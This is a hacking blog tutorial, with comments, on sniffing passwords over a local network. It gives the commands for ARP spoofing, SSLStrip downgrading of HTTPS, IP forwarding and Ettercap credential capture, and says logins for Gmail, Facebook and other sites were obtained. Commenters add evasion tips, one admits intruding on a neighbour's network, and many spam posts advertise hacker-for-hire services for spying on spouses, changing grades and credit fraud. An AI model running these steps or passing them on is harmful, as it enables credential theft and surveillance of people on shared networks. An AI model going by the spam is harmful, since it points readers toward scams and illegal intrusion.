Blog for netsec, linux, windows, and hacking! New readers: If you want a list of my posts, check out my "hackive" or "popular posts" on the sidebar! If you want to support my blog there is a donate option, but do not feel obliged as this education is free!

If you don't have any of these, follow the links and set up your system before continuing.

Notice: This is purely for educational value, do not attempt this on a network you do not PERSONALLY own. If you do this on a public or private network that you do not have authorization to do so on, it is illegal and you will probably get caught.

Okay, so what we're doing today is using a few programs to sniff passwords over a network and redirect secure HTTPS connections to non-secure HTTP connections to help us get even more passwords.
I've successfully gotten passwords and user names from Gmail, Facebook, Ureddit, Reddit, and Youtube; but all sites should work.

Lets begin:

First, we need to figure out the IP address of the user we want to sniff, and the gateway IP (usually 192.168.0.1 or 192.168.x.1 depending on the network)

You should have SOME experience with finding users on a network, but if you don't, you can use a program that comes on Backtrack 5 called "Kismet" to identify users, or use the program "Nmap" (short for network mapper).

The most simple Nmap command to run would be: nmap -sn 192.168.0.0/24 depending on what your IP range and subnet is.

the "-sn" option tells nmap not to port scan, and only do host discovery. This option is called the Ping Scan option since it essentially is just performing a large ping scan over the subnet.

The first one (lowest number at the end, such as 192.168.0.1) is the gateway, so remember what number that is.

You can figure out what yours is by doing our good old friend "ifconfig" and looking at your IP address. You can then figure out which ones are other computers and choose which one you wish to directly sniff.

What we have to do is flip our computer into "forwarding" mode which allows us to forward packets along to other computers. Issue the command: "echo 1 > /proc/sys/net/ipv4/ip_forward" which places "1" (true or allow in computer language) into the file "ip_forward" with the ">" operator.

I'm using the port 666 because it's easy to remember, but you can use any port that isn't already being used. You probably already know that port 80 is for HTTP traffic, so you can understand why the "destination port" is that. I'll explain the rest later, so don't worry if it doesn't make sense, just check back later!

Important note here: run the command "cat /etc/etter.conf |grep iptables" and if your output is:

Now we have to run SSLStrip to strip any HTTPS connections and redirect them to HTTP (unsecure) connections. The name SSLStrip is quite perfect, eh?

To start SSLStrip on my computer, I have to navigate to the SSLStrip folder with the command "cd /pentest/web/sslstrip" first, then issue the command "python sslstrip.py -l 666" to run the program.
This runs the python script file that starts the program. Python is a scripting language like Perl or Ruby and we will learn about it more in the future. If you're interested in Netsec and want to learn a programming language on your own, definitely check out Python and Perl to start.

Don't close this terminal.

We have to ARP spoof or ARP poison our target computer. We learned about ARP here, and if you haven't read it already, go do so before continuing.
Open a new terminal now for our ARP spoofing, and run the command:
"arpspoof -i [your interface] -t [target computer ip address such as 192.168.0.111] [gateway ip address such as 192.168.0.1]

If you want to arp-spoof the ENTIRE network, issue the command "arpspoof -i [interface] [gateway IP].
Thanks to Volvox for the above hint, but watch out, because if your computer cant handle all the redirecting the network requires, it will DoS (denial of service) the network and your computer resources.

Don't close this terminal.

Now open another terminal and lets start Ettercap! We will be using it in text mode today because I personally like it better (it feels less script-kiddie like and easier to navigate/issue commands).

Run the command "ettercap -m [any_file_name.txt] -Tq -i [interface]" and a text interface will come up telling you a bunch of information (I'll post what mine looks like soon).

I forgot to mention, to enable on the Ettercap terminal interface, you have to push the space-bar to show the packets coming in... do this and then if there's any navigation on the target computer, you should see the packets start appearing rapidly across your screen.
Hopefully you're doing this legally on your own network so you can test this out... Open up a browser in your target computer and go to mail.google.com and try to log in. It should redirect you to the HTTP version (but to a normal person, this wont be noticable). Log in with your credentials and you should see something pop up on your Ettercap that looks like a packet from gmail. If it's scrolling too fast (which happens), then don't worry, I'll show you how to open up your file.

Open a new terminal while Ettercap is running (don't close it!) and issue the command "cat [your_file_name.txt]"
Now you can see all the information that was printed at first, and at the bottom there should be some sniffed data if all went well (I'll post a screen-shot later).
Lets clean this up a bit. Issue the command "cat [your_file_name.txt] |grep USER |cut -d" " -f3-12"
The quotation marks after the d should be normal, but of course the ones surrounding the entire command are not.
You should see your data cleaned up quite a bit. I'll run through what that command did later, but I hope you understand some of this for now.

Do you mean ban using MAC address? Backtrack comes with a little tool called macchanger. If you're cracking wireless or anything it should probably be used just to stop routers from getting your real mac too.

Wow, great information. I'm actually looking into majoring in Computer Science / Computer Security next semester, so I'm hoping that all your information is gonna help me better understand the subject!!! Keep up the good work!!! :D

@Inverse, check out my "learning linux" post, it might help make linux an easier experience.@TBFB, thanks man, dual-booting is almost always better since it allows you to have access to more options than other people (for instance, Cain&Abel is Windows only).

Sometimes when it rains my connection stops working. I thought it would be a good idea to use my neighbor's connection when that happened. So, I broke into his connection, only to discover he has the same ISP and his connection stops working whenever my connection stops working, haha.

Been doing this for a little while now on my home network. Something else that works for arpspoof is to just hit the entire network!arpspoof -i This will target anyone on the network but note that if your machine cannot handle all the traffic, it will shut down the entire network. People will notice because the route needs to re arp the network topology and does not do it immediately! Good luck!

How is this "sniffing passwords over wifi connection"? This article seems to assume you already have access to the local network. Ie. if it's a wpa2 secured network you wouldn't be able to do any of the above without the pw.

Why I did cat | grep is because I needed to place it into a file and since I'm just starting that was the way I knew it; my BASH scripting post will be updated ;D

@Anon, how else could you sniff packets unless you're connected to the network? It makes no sense to not assume you're already connected.Wpa2 can still be cracked, it just requires a dictionary attack.

Get high range wifi connections for your laptops by using long range USB wifi Adapter available at wifi decoder. It also includes wifi signals, hi power antenna, wifi decoder wholesale and many more to make your connection accessible in long distances.

Get high range wifi connections for your laptops by using long range USB wifi Adapter available at wifi decoder. It also includes wifi signals, hi power antenna, wifi decoder wholesale and many more to make your connection accessible in long distances.

Get high range wifi connections for your laptops by using long range USB wifi Adapter available at wifi decoder. It also includes wifi signals, hi power antenna, wifi decoder wholesale and many more to make your connection accessible in long distances.

@Marshal - Question. I run Ettercap on my laptop, "attacking" my desktop, I was able to see all of the packet information and such on the terminal screen. But when I saved it to a file, here is all I got out of it: http://chigstuff.com/uploads/this.txt

@Chris, you have to follow one of the first command that's flipping your computer into forwarding mode by using the echo command to set forwarding on using the ">" linux command. If you didn't do this you will receive that error. Try doing this then get back to me on if it works. Hope this helps!

Hi.Thanks for the helpful post. I did exactly what you did and was able to retrieve some passwords. However, after a while the terminal running ettercap just stops and shows an error that the iptable must be upgraded. After this I tried to do the steps again but no more passwords seem to come up, only lines that have DHCP then some numbers. I am using backtrack 4 with netbootin from my USB stick.

I successfully tried the ettercap for sniffing passwords on LAN and on WiFi network which don't have a security key.But when I'm in university, here network has WPA/WPA-2 key, although I know the key and i'm connected to the network, ARP Poisoning causes the victims not to be able to open webpages. What I've sorted out using my own routter by enabling and disabling WPA/WPA-2 key is that this sniffing has something to do with WPA/WPA-2 key. What I feel is that on a security enabled WiFi network, even though we're connected to it, MITM attacks are not successfull.If it is otherwise, please explain...

@Anon, how big is your uni network? I'm assuming it's quite large, so your computer cannot handle all the traffic. Also, I would suggest NOT doing this on a public network, especially your university's, because it's not only against their TOS but illegal and can get you arrested or kicked out of school. My school has very strict policies with MITM attacks and packet sniffing (it's NOT allowed and strictly enforced), so I guess yours would too.

i'm having a problem... when i enter the command to start ettercap theres a message displayed that says 'ssl dissection needs a valid redir_command_on script in the etter.conf file' but i've already removed the "#" from the code. any help is much appreciated

Great article. One issue i have is that once i start spoofing, my victim machine can go to HTTP sites just fine. But when i try to go to an SSL site, the browser times out. I double checked that it ip forwarding is on, any ideas what i can checknext?

And you never even mentioned what type of wireless NIC you used. Shame on you. Wasting everyone's time. Very few wifi nics are capable of arpspoofing. Maybe help out the community by listing the hardware used.

I removed the pingscan script as Nmap does it quite a bit more effectively :]I wrote that script a few years ago when I was quite ignorant of general usage, so I would definitely use Nmap in any situation now.

"my ettercap show this error :SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534..." for this i would recommend the same step of "cat /etc/etter.conf |grep uid " and nano it to change the UID and GID to 0, which mean you will get the root privilege.

HELP!! My ex-boyfriend is in Afghanistan a UK contractor that does secured comms for NATO. No matter what I do he can still get into my accounts and I can't figure out how he is doing it.. I have done everything password resets, imaging my laptop, replacing hardware, changed all my security questions.. This has all been done on my computer at work on a secured network. How is he getting my IP? I desperately want to find out how he is doing this more out of curiousity than anything else. I am beyond pissed off this has been going on for 2 + years.. Any suggestions? I am not as computer savy as I use to be...

You should try to change all your passwords and security questions through a different location. For example an internet cafe.

Afterwards, do not log in to your accounts from any of your machines before you make sure they are secure and free of malicious code.The easiest way is to format everything but I guess you have stuff you want to keep so let's review another option. (Not to mention he may just be poisoning your network from a nearby remote location)

Remove your HDD and take them to a friend's house. Insert the HDD there and perform an AV scan ( preferably something reputable that has high %% detection rate, including rootkits and other fun stuff like that ) on the whole drive. Presumably, this will ensure that your own machine is secure. If he's an expert, there is a possibility he's using some serious FUD stuff but let's hope he's not.

Lastly, you need to ensure there is no unauthorized device connected to your network which may be poisoning your LAN. Easiest way to find out is through the DHCP tables in your router. Routers vary and it may be under a different name so you'll have to play around with the options until you find a list of connected devices. If that fails, you could try and scan your networks for unknown clients ( e.g. not you ) with nmap or an equivalent tool. But, if he does secured comms, that may be fruitless as he may be able to mask his host as a dead one. In which case, I have no solution.

He might have infected your phone in which case I suggest you stop using the installed apps ( uninstall facebook etc ).

Disable wireless connectivity on your router and connect your laptop through a wired connection if you suspect poisoning but cannot find him. ( there are routers which provide safeguards against such attacks but I don't think that's necessary ) Moreover, just to be on the safe side, turn off your laptop wifi ( either a hardware button or in adapter settings, right click -> disable ).

That would be very interesting-- I haven't used SSLStrip in a while and wasn't aware of the Google change. I'm definitely waiting for a fix from someone about this but I'm not sure how often SSLStrip is updated.

I don't seem to be having much luck & I've followed everything step by step.The network connection for the target machine comes to a near stop making it practically impossible to use.sslstrip does not seem to be doing anything as the URL is not changing for https sites.

The etercap text file only captures the below information although I can clearly see far more than this when looking at the packets coming in.

The connection on your target machine is becoming very slow because your attacking computer probably cant handle all the traffic it is receiving. What websites have you tried? Some websites only offer HTTPS for certain pages, so that could be your problem.

I've done sniffing over any WiFi connection ever because I don't really know how to do it actually. Really enjoyed learning how to actually accomplish such tricky works through reading such enormous allocation!! Thanks for helpful contribution.

Oh man! This is great stuff this is...!!! Thank you so much for teaching us! This is truly a great introduction. So, by issuing those commands above, you now have full access of all out terminals? LOL >.<

An fascinating discussion is value comment. I think that it is best to write extra on this matter, it won’t be a taboo topic however generally people are not enough to talk on such topics. To the next. Cheers Best wi-fi router

Awesome article! I want people to know just how good this information is in your article. It’s interesting, compelling content. Your views are much like my own concerning this subject. battery operated night lights

Be ware of scammers i have been scammed 3 times because i was trying to know if my husband was cheating until i met this hacker named; WIZARDCYPRUSHACKER@GMAIL.COM who helped me hack into my spouse phone for real this great hacker hacked into my spouse whats-app messages,Facebook messages.text messages,call logs,deleted text messages and many more i was impressed with his job and he brought me results under 24 hours believe me he is real and his services are cheap and affordable.

Tired of getting scammed by fraudulant hackers? HC can help you with any needs from security, to spying on a cheater, to changing grades, helping with credit issues, hacking any social media, and more contact proethicalhelp@protonmail.com today for prices and assistance. These people helped me out when I really needed it so I guarantee their work. Email at proethicalhelp@protonmail.com

Are you desperately in need of a hacker in any area of your life???then you can contact; (AnonymousFileHacker@hotmail.com) by email, Skype id: Anonymous File Hacker or Whatsapp him on +1(802) 821-0003 I will help you at affordable prices, i offer services like;

i was lost with no hope for my wife was cheating and had always got away with it because i did not know how or always too scared to pin anything on her. with the help a friend who recommended me to HACKINTECHNOLOGY AT g mail dot com who help hack her phone, email, chat, sms and expose her for a cheater she is. I just want to say a big thank you to HACKINTECHNOLOGY At G mail DOT com. am sure someone out there is looking for how to solve his relationship problems, you can also contact him for all sorts of hacking job..he is fast and reliable. CONTACT via text +1 845 643 6145 or text on whats app through this number + 1 845 643 6145

On behalf of my family we want to say a big thank you to Kenny Blackhat, i have been thinking on how to show my appreciation for the assistance you did offered for the credit score job... We've got 440 and was seeking credit repair on how to increase the points up to 700+ in order to live a comfy way. I saw some russian students he worked for recommendation on this forum and i contacted kenny for the hacking job, he did explain and advice on how he was gonna alter these various points. Took exactly 5 days to clearly reveal the points, and to our greatest surprise it was actually 750!...I just wanna say a big THANK YOU to you and your team Kenny Group blackhat, in case you're wondering who Kenny blackhat is, he's the real deal on any hacking job you want and related forums. I say well done kenny. kennyblackhat@hackermail. com is the mail and they do have a cell number for other communications at +1 717-388-3985 and i am Mrs Lynn Sisto. thank you again kenny Group Blackhat and may God bless deeply.

This article is an engaging abundance of enlightening information that is intriguing and elegantly composed. I praise your diligent work on this and thank you for this data. You have what it takes to get consideration. lesmeilleurs vpn

I really enjoy simply reading all of your weblogs. Simply wanted to inform you that you have people like me who appreciate your work. Definitely a great post. Hats off to you! The information that you have provided is very helpful. vpn austria

Gaining access into my wife’s device was not that easy, as my expertise wasn’t that much not until I told AFONKAPETROV@TUTANOTA.COM about this. He helped in cracking the AES (Advanced Encryption Standard) and EXPLOITING all VULNERABILITIES in the device hereby providing a thorough access to the mobile’s data. After all, it was not a waste of effort. There was SEVERE INFIDELITY on her part. Now, I guess I need the divorce immediately and child custody too.

If you really need a professional hacker to hack your cheating boyfriend's/girlfriend's/spouse phone, whatsapp, facebook, bank account hack etc. Or credit score upgrade, I would recommend ETHICALHACKERS009@GMAIL.COMHe has proven to be trustworthy, His jobs are fast and affordable. He has carried out over 3 jobs for me including helping me hack my ex wife's mobile phone and i can't forget when he cleared my credit card debts and improved my credit score to 750. I can put my money on him at anytime!. He's one of the best out there. Spreading the word as my little favor to him for all he's done. Thank me later.

I had a fruitless search for a lover, all F.A.K.E acquaintances. I even lost a bit above 39,400 EURO. My worst experience, but I didn’t let him go with this. I had reported this case to AFONKAPETROV@ TUTANOTA. COM . I was able to recover funds he stole from me as a result of AFONKA’S ADVANCED PENETRATION into HIS MOBILE PHONE LINKED TO HIS BANK, SNIFFED HIS MAILS AND WAS ABLE TO H.A.C.K INTO HIS BITCOIN WALLETS. We gained more than I lost and shared BTC with AFONKA. I am so delighted, even donated to charity. I don’t think I’ll try to find love online ever again. It wasn’t a good experience.

MY NIECE HAD ISSUES IN COLLEGE and needed some grades upgraded discreetly, I was directed to contact AFONKAPETROV@ TUTANOTA. COM This was a major breakthrough for us from her failure. The reason behind this was due to s.e.x.u.a.l a.s.s.a.u.l.t.s by the College Professor. This instigated failure for my niece. We had reported the case earlier and nothing was done. Anyway, her grades were successfully changed.

I Want to use this medium in appreciating cyber golden hacker , after being ripped off my money,he helped me find my cheating lover he helped me hack her WHATSAPP, GMAIL and kik and i got to know that he was cheating on me, in less than 24 hours he helped me out with everything, cybergoldenhacker is trust worthy and affordable contact him on: cybergoldenhacker at gmail dot com

The effectiveness of IEEE Project Domains depends very much on the situation in which they are applied. In order to further improve IEEE Final Year Project Domains practices we need to explicitly describe and utilise our knowledge about software domains of software engineering Final Year Project Domains for CSE technologies. This paper suggests a modelling formalism for supporting systematic reuse of software engineering technologies during planning of software projects and improvement programmes in Project Centers in Chennai for CSE.

Spring Framework has already made serious inroads as an integrated technology stack for building user-facing applications. Spring Framework Corporate TRaining the authors explore the idea of using Java in Big Data platforms. Specifically, Spring Framework provides various tasks are geared around preparing data for further analysis and visualization. Spring Training in Chennai

I believe it was impossible to alter grades on a university database. I was in desperate need of a grade reconstruction. I was in dire need of an hacker with incredible penetration abilities. I stumbled on THE_PRIEST@TUTANOTA.COM who had tremendous reviews of successful grade re-constructions without a detection from the school's security. I put my faith in The Priest. I was anxious and worried through the 72 hours of the project. It has been over a month now and my grades are great and there's been no detection. I owe it to you THE_PRIEST@TUTANOTA.COM you are my hero!!

A wireless router is a gadget that interfaces with your home or office modem, so you may associate different gadgets, ordinarily wired and wireless to your web association simultaneously. best wifi router